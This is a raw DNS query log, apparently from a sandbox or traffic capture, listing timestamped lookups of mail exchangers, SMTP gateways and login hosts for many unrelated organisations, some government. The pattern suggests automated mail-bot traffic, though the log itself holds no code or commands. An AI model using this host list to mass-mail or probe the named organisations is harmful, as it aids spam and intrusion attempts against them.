                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.273690939 CET1.1.1.1192.168.2.60x1f2bNo error (0)xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com185.78.166.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.273756027 CET1.1.1.1192.168.2.60x1f2bNo error (0)xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com185.78.166.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.285972118 CET1.1.1.1192.168.2.60xb2d5No error (0)yellosa.co.za172.66.41.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.285972118 CET1.1.1.1192.168.2.60xb2d5No error (0)yellosa.co.za172.66.42.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.286015034 CET1.1.1.1192.168.2.60xb2d5No error (0)yellosa.co.za172.66.41.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.286015034 CET1.1.1.1192.168.2.60xb2d5No error (0)yellosa.co.za172.66.42.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.296701908 CET1.1.1.1192.168.2.60x2ad6No error (0)academico.um.edu.mx201.134.41.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.307890892 CET1.1.1.1192.168.2.60x11deNo error (0)innovationdevelopment.eu185.51.191.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.307909012 CET1.1.1.1192.168.2.60x11deNo error (0)innovationdevelopment.eu185.51.191.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315448999 CET1.1.1.1192.168.2.60xc850No error (0)m.sellercenter.lazada.com.myasc-hub.lazada.com.myCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315448999 CET1.1.1.1192.168.2.60xc850No error (0)asc-hub.lazada.com.myxjp.wagbridge-lazada.alibaba-inc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315448999 CET1.1.1.1192.168.2.60xc850No error (0)xjp.wagbridge-lazada.alibaba-inc.comxjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315448999 CET1.1.1.1192.168.2.60xc850No error (0)xjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comlazada-sg.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315448999 CET1.1.1.1192.168.2.60xc850No error (0)lazada-sg.alibaba.comlazada-sg.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315448999 CET1.1.1.1192.168.2.60xc850No error (0)lazada-sg.alibaba.com.gds.alibabadns.comlazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315448999 CET1.1.1.1192.168.2.60xc850No error (0)lazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.comlazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315546036 CET1.1.1.1192.168.2.60xc850No error (0)m.sellercenter.lazada.com.myasc-hub.lazada.com.myCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315546036 CET1.1.1.1192.168.2.60xc850No error (0)asc-hub.lazada.com.myxjp.wagbridge-lazada.alibaba-inc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315546036 CET1.1.1.1192.168.2.60xc850No error (0)xjp.wagbridge-lazada.alibaba-inc.comxjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315546036 CET1.1.1.1192.168.2.60xc850No error (0)xjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comlazada-sg.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315546036 CET1.1.1.1192.168.2.60xc850No error (0)lazada-sg.alibaba.comlazada-sg.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315546036 CET1.1.1.1192.168.2.60xc850No error (0)lazada-sg.alibaba.com.gds.alibabadns.comlazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315546036 CET1.1.1.1192.168.2.60xc850No error (0)lazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.comlazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.317049026 CET1.1.1.1192.168.2.60x66b9No error (0)s163-es.ogame.gameforge.com79.110.82.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.538316011 CET1.1.1.1192.168.2.60xae6fNo error (0)gitam.zoom.uswww.zoom.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.538316011 CET1.1.1.1192.168.2.60xae6fNo error (0)www.zoom.uszoom.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.538316011 CET1.1.1.1192.168.2.60xae6fNo error (0)zoom.us170.114.52.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.539623976 CET1.1.1.1192.168.2.60xbd9eNo error (0)ssc.nic.in164.100.213.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.539638042 CET1.1.1.1192.168.2.60xbd9eNo error (0)ssc.nic.in164.100.213.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.544051886 CET1.1.1.1192.168.2.60x87dcNo error (0)testconnect.garena.com202.81.112.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.550076008 CET1.1.1.1192.168.2.60x88c1No error (0)account.mojang.com20.231.114.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.550815105 CET1.1.1.1192.168.2.60x2d44No error (0)oferta.senasofiaplus.edu.co186.113.7.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.553179026 CET1.1.1.1192.168.2.60x239dNo error (0)analvids.com185.120.71.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.553179026 CET1.1.1.1192.168.2.60x239dNo error (0)analvids.com185.120.71.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.553179026 CET1.1.1.1192.168.2.60x239dNo error (0)analvids.com185.120.71.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.561089039 CET1.1.1.1192.168.2.60x7370Name error (3)mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.568782091 CET1.1.1.1192.168.2.60x2a11No error (0)ov.edesur.com.do179.51.70.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.568782091 CET1.1.1.1192.168.2.60x2a11No error (0)ov.edesur.com.do200.88.115.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.575742960 CET1.1.1.1192.168.2.60x7653No error (0)pxndx-mcr.boletia.com54.85.194.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.575742960 CET1.1.1.1192.168.2.60x7653No error (0)pxndx-mcr.boletia.com3.219.54.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.575742960 CET1.1.1.1192.168.2.60x7653No error (0)pxndx-mcr.boletia.com44.199.96.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.575742960 CET1.1.1.1192.168.2.60x7653No error (0)pxndx-mcr.boletia.com52.21.29.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.578013897 CET1.1.1.1192.168.2.60x11dbNo error (0)alt2.gmr-smtp-in.l.google.com108.177.12.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.582779884 CET1.1.1.1192.168.2.60x5fbaNo error (0)loopex.io172.67.148.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.582779884 CET1.1.1.1192.168.2.60x5fbaNo error (0)loopex.io104.21.39.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.651051044 CET1.1.1.1192.168.2.60x61bbNo error (0)park-mx.above.com103.224.212.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com164.90.197.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com147.182.180.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com164.90.197.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com164.90.197.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com147.182.189.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com164.90.197.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com147.182.130.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com147.182.160.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.660273075 CET1.1.1.1192.168.2.60xcb7fNo error (0)mx3.name.com173.192.7.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.661104918 CET1.1.1.1192.168.2.60xfe39No error (0)mail2.casinocontroller.com52.200.128.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.714498043 CET1.1.1.1192.168.2.60xba4bNo error (0)cjdropshipping.com47.251.24.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.714498043 CET1.1.1.1192.168.2.60xba4bNo error (0)cjdropshipping.com47.88.85.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.716212988 CET1.1.1.1192.168.2.60xa198No error (0)mail.nossoplayer.me162.241.203.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.771703959 CET1.1.1.1192.168.2.60xeefaNo error (0)mx-1.cloudevelops.com185.120.71.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.772268057 CET1.1.1.1192.168.2.60x785bNo error (0)mx.yandex.net77.88.21.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.775774956 CET1.1.1.1192.168.2.60xca7aNo error (0)login2.innova.puglia.it138.66.39.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.775799036 CET1.1.1.1192.168.2.60xca7aNo error (0)login2.innova.puglia.it138.66.39.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.815629005 CET1.1.1.1192.168.2.60xf683No error (0)th-th.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.815629005 CET1.1.1.1192.168.2.60xf683No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.815629005 CET1.1.1.1192.168.2.60xf683No error (0)star.c10r.facebook.com31.13.88.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.824137926 CET1.1.1.1192.168.2.60x2f2dNo error (0)mx2.saudi.net.sa84.235.6.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.835205078 CET1.1.1.1192.168.2.60xf683No error (0)th-th.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.835205078 CET1.1.1.1192.168.2.60xf683No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.835205078 CET1.1.1.1192.168.2.60xf683No error (0)star.c10r.facebook.com31.13.88.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.852965117 CET1.1.1.1192.168.2.60x1b07No error (0)uh-is.mail.protection.outlook.com52.101.68.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.852965117 CET1.1.1.1192.168.2.60x1b07No error (0)uh-is.mail.protection.outlook.com52.101.73.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.852965117 CET1.1.1.1192.168.2.60x1b07No error (0)uh-is.mail.protection.outlook.com52.101.73.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.852965117 CET1.1.1.1192.168.2.60x1b07No error (0)uh-is.mail.protection.outlook.com52.101.73.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.852965117 CET1.1.1.1192.168.2.60x1b07No error (0)uh-is.mail.protection.outlook.com52.101.73.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.852965117 CET1.1.1.1192.168.2.60x1b07No error (0)uh-is.mail.protection.outlook.com52.101.68.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.852965117 CET1.1.1.1192.168.2.60x1b07No error (0)uh-is.mail.protection.outlook.com52.101.68.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.10.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.14.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.14.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.923737049 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.14.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.951694012 CET1.1.1.1192.168.2.60x9482No error (0)mx.sistemas.pa.gov.br177.74.1.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.958453894 CET1.1.1.1192.168.2.60x7278No error (0)woomar.hostingas.lt194.135.86.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.14.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.14.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.14.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.2.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.985277891 CET1.1.1.1192.168.2.60xe7e4No error (0)mailgw.nic.in164.100.10.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.986192942 CET1.1.1.1192.168.2.60x7278No error (0)woomar.hostingas.lt194.135.86.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.986532927 CET1.1.1.1192.168.2.60x9482No error (0)mx.sistemas.pa.gov.br177.74.1.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.986605883 CET1.1.1.1192.168.2.60xa66No error (0)mxa.mailgun.org34.160.13.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.992850065 CET1.1.1.1192.168.2.60x5b5No error (0)mxdomain.qq.commx3.qq.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.992850065 CET1.1.1.1192.168.2.60x5b5No error (0)mx3.qq.com203.205.219.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.992927074 CET1.1.1.1192.168.2.60x5b5No error (0)mxdomain.qq.commx3.qq.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.992927074 CET1.1.1.1192.168.2.60x5b5No error (0)mx3.qq.com203.205.219.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.020332098 CET1.1.1.1192.168.2.60x1c58No error (0)mx1.tiktok.com35.172.32.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.021034002 CET1.1.1.1192.168.2.60xad1aNo error (0)mail.zarkana2.ro188.212.100.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.021054029 CET1.1.1.1192.168.2.60xad1aNo error (0)mail.zarkana2.ro188.212.100.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.055790901 CET1.1.1.1192.168.2.60xb325No error (0)mxa-00569201.gslb.pphosted.com205.220.166.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.075763941 CET1.1.1.1192.168.2.60x3678No error (0)mx2.tiktok.com35.172.32.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.076800108 CET1.1.1.1192.168.2.60x5b7aName error (3)relay.signup2.br.leagueoflegends.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.089020967 CET1.1.1.1192.168.2.60x80b3Name error (3)mailgate.signin.rockstargames.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.094844103 CET1.1.1.1192.168.2.60xf6b8No error (0)mail.api.cmrsanmartin.ziz.clcmrsanmartin.ziz.clCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.094844103 CET1.1.1.1192.168.2.60xf6b8No error (0)cmrsanmartin.ziz.cl138.197.59.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.098225117 CET1.1.1.1192.168.2.60xc930Name error (3)pop.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.099627972 CET1.1.1.1192.168.2.60xfba7Name error (3)pop.store.steampowered.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.107137918 CET1.1.1.1192.168.2.60x195fNo error (0)gmr-smtp-in.l.google.com142.251.15.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.118335009 CET1.1.1.1192.168.2.60x894dName error (3)relay.store.steampowered.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.118927956 CET1.1.1.1192.168.2.60x708dName error (3)mail.v.xsanime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.129008055 CET1.1.1.1192.168.2.60x5c3No error (0)mx.nexters.com54.216.244.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.130435944 CET1.1.1.1192.168.2.60x816eName error (3)mail.account.live.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.133441925 CET1.1.1.1192.168.2.60x3b03No error (0)terna.net104.21.5.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.133441925 CET1.1.1.1192.168.2.60x3b03No error (0)terna.net172.67.132.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.195301056 CET1.1.1.1192.168.2.60x131dNo error (0)kamgarsetu.mp.gov.in103.94.204.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.195317984 CET1.1.1.1192.168.2.60x131dNo error (0)kamgarsetu.mp.gov.in103.94.204.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.195332050 CET1.1.1.1192.168.2.60x131dNo error (0)kamgarsetu.mp.gov.in103.94.204.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.196502924 CET1.1.1.1192.168.2.60x3f4dName error (3)smtp.contribuyente.seniat.gob.venonenoneA (IP address)IN (0x0001)false
